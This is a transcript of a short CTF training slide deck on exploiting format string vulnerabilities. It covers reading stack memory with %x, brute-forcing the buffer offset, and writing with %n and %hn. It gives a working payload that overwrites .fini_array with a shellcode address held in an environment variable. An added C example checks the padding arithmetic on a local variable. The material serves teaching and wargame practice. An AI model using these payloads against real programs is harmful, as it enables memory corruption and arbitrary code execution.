String format exploitation in 15"

Short course I gave about format string vulnerabilities exploitation. Mostly for wargames/CTF.

Source code can be found at:
* https://github.com/milkmix-/training/tree/master/strfmt

Julien Bachmann

January 22, 2015
Transcript

  1. Exploiting format string in 15’’
    CTF training session
    Julien Bachmann / @milkmix_

  2. intro | source?
    Coming from variadic functions
    va_arg
    printf
    Missing format string
    When the user can specify the format string

  3. intro | consequence?
    Two possibilities
    display process memory
    modify process memory :)

  4. intro | man 3 printf
    printf("hex value: %x", 42);
    int i;
    printf("number of bytes so far%n", &i);
    printf("%2$s %1$s\n", "world", "Hello");

  5. read | detail
    printf(buf);
    printf("%x");
    0x42424242
    0x41414141
    buf
    @ret
    %ebp
    local

  6. read | detail
    printf(buf);
    printf("%2$x");
    0x42424242
    0x41414141
    buf
    @ret
    %ebp
    local

  7. read | find our buffer
    It is on the stack
    need to find the virtual argument index that makes printf read it
    brute force it!
    possibly need to add [1-3] padding bytes to align on 4 bytes

  8. read | our target

  9. read | find our buffer
    for offset in `seq 0 20`; do echo "offset=$offset"; ./strfmt "AAAA%$offset\$x"; echo; done | grep 4141 -B1

  10. write | specific address
    Put it in our buffer
    Use %n to write instead of %x to read
    Check the system endianness

  11. write | specific address
    ./strfmt `python -c 'print "B\x42\x42\x42\x42%6$n"'`

  12. write | specific address

  13. write | specific address
    What to overwrite?
    interesting variable
    GOT
    .dtor
    .fini_array
    checksec to validate writable zones

  14. write | specific address

  15. write | specific address
    How to write
    Endianness again ;)
    Not possible to write 0xffffdee8 (shellcode address in environment) in one pass
    Split in two
    0xdee8
    0xffff - 0xdee8
    Use %hn to write only a 16-bit word, so the second write does not overwrite the first half

  16. write | specific address
    EGG=`python -c 'print "\x90"*100+""'` ./strfmt `python -c 'print "B\x68\x96\x04\x08\x6a\x96\x04\x08%57055c%6$hn%8471c%7$hn"'`
    \x68\x96\x04\x08 : @<.fini_array>
    \x6a\x96\x04\x08 : @<.fini_array> + 2
    %57055c : 0xdee8 - 9
    %8471c : 0xffff - 0xdee8
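    To check the width arithmetic of slide 16 (9 bytes already printed, then 0xdee8 - 9 and 0xffff - 0xdee8) without any buffer-supplied address, here is an added C example that is not from the deck or its repository: it performs the two %hn writes into its own local variable, taking the padding widths from %*c arguments so the format string stays a literal, and it generalizes the split to any 32-bit value (the function names are mine).

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

/* Padding width for a %*c so the running character count reaches `want`
 * (mod 2^16) after `already` characters. A width of 0 would still print
 * one character, so wrap to a full 0x10000 in that case. */
static unsigned pad_width(unsigned want, unsigned already) {
    unsigned w = (want - already) & 0xffff;
    return w ? w : 0x10000;
}

/* Width before the first %hn: slide 16 uses 0xdee8 - 9 = 57055. */
unsigned first_width(uint32_t value, unsigned already) {
    return pad_width(value & 0xffff, already);
}

/* Width between the two %hn: slide 16 uses 0xffff - 0xdee8 = 8471.
 * When the high half is smaller than the low half, the count simply
 * wraps past 0x10000 and %hn keeps only the low 16 bits. */
unsigned second_width(uint32_t value) {
    return pad_width(value >> 16, value & 0xffff);
}

/* Do the two %hn writes into an ordinary local (our own pointers, not an
 * address read from input), then reassemble the value as it would sit in
 * little-endian memory: low half at addr, high half at addr+2.
 * `already` is the byte count printed before the padding ("B" plus two
 * 4-byte addresses on the slide: 9); it must be at least 1. */
uint32_t split_hn_write(uint32_t value, unsigned already) {
    short halves[2] = {0, 0};          /* %hn stores into a short */
    int w1 = (int)first_width(value, already);
    int w2 = (int)second_width(value);
    if (already == 0) return 0;
    size_t cap = (size_t)already + 2 * 0x10000 + 16;
    char *out = malloc(cap);
    if (!out) return 0;
    /* %*c: field width comes from an int argument, so no attacker-shaped
     * format string is needed to reproduce the counting behaviour. */
    snprintf(out, cap, "%*c%*c%hn%*c%hn",
             (int)already, 'B', w1, 'A', &halves[0], w2, 'A', &halves[1]);
    free(out);
    return ((uint32_t)(uint16_t)halves[1] << 16) | (uint16_t)halves[0];
}
```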

  17. auto | libformatstr
    From hellman
    Brute force and format automatic generation :)